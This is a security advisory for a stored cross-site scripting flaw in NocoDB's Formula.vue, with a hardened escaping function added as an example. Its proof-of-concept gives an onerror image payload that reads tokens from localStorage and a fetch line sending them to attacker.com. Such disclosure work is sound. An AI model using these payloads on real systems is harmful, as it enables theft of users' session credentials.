HIGH 7.3

GHSA-h6r4-xvw6-jc5h

NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue

Details

### Summary

A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.

### Details

nc-gui/components/virtual-cell/Formula.vue renders a v-html tag whose value is "urls", the output of the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag <a> with href=XXX. However, it leaves all other content outside the URI::(XXX) pattern unchanged and unescaped, so a malicious user can create a table with a formula field whose payload is <img src=1 onerror="malicious javascript"URI::(XXX). The malicious user can then share this table with others by enabling public viewing, and any victim who opens the shared link is attacked.
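As an added example, not NocoDB's own code, the block below shows a hardened variant of the link-rewriting logic the advisory describes: every piece of text outside the URI::(...) pattern is HTML-escaped before it is handed to v-html, and the URL inside the pattern is turned into a link only when it parses with an http or https scheme (and is attribute-escaped even then). The function names, the regular expression and the sample inputs are assumptions made for this illustration.

```javascript
// Added example, not NocoDB's code. Hardened replacement for a
// replaceUrlsWithLink()-style helper: escape everything that is not a
// recognised URI::(...) token, and only emit <a> for http/https URLs.

// Assumed token syntax: URI::(<url>) with no nested parentheses.
const URI_PATTERN = /URI::\(([^)]*)\)/g;

// Minimal HTML escaping for text and attribute contexts.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Accept only absolute http/https URLs; javascript:, data: etc. are rejected.
function isSafeHttpUrl(raw) {
  try {
    const u = new URL(raw);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch {
    return false;
  }
}

// Build markup from untrusted cell text. The result is safe to place in
// v-html because no untrusted character reaches the output unescaped.
function replaceUrlsWithLinkSafe(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(URI_PATTERN)) {
    out += escapeHtml(text.slice(last, m.index)); // text before the token
    const url = m[1].trim();
    if (isSafeHttpUrl(url)) {
      const safe = escapeHtml(url); // attribute-escaped href and link text
      out += `<a href="${safe}" target="_blank" rel="noopener noreferrer">${safe}</a>`;
    } else {
      out += escapeHtml(m[0]); // unsupported scheme: render the token literally
    }
    last = m.index + m[0].length;
  }
  out += escapeHtml(text.slice(last)); // text after the last token
  return out;
}

// Constructed sample inputs; the first mirrors the shape of the payload
// described in the advisory, the second carries a non-http scheme.
const SAMPLES = [
  '<img src=1 onerror=alert(1)>URI::(https://example.com/docs)',
  'see URI::(javascript:alert(1)) and URI::(http://example.org)',
  'plain text with no link',
];

function demo() {
  return SAMPLES.map(replaceUrlsWithLinkSafe);
}

for (const html of demo()) console.log(html);
```

The design choice worth noting is that escaping happens on the raw text segments before any markup is assembled, rather than trying to strip dangerous tags afterwards; the only HTML in the output is the anchor the function itself emits, with a scheme-checked, attribute-escaped href.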

### PoC

Step 1: The attacker logs in to NocoDB and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of "F" is "Formula" with the formula content {T}

Step 2: The attacker sets the contents of T to <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)

Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims

Step 4: Any victim who opens the shared link in their browser will see the alert with their confidential tokens stored in localStorage

The attackers can replace the alert with fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) and then collect the victims' credentials on their attacker.com website.

### Impact

Stealing the credentials of any NocoDB user who clicks the malicious link.


Affected packages

npm / nocodb
Introduced in: 0
Fixed in: 0.202.9
Fix: npm install nocodb@0.202.9

References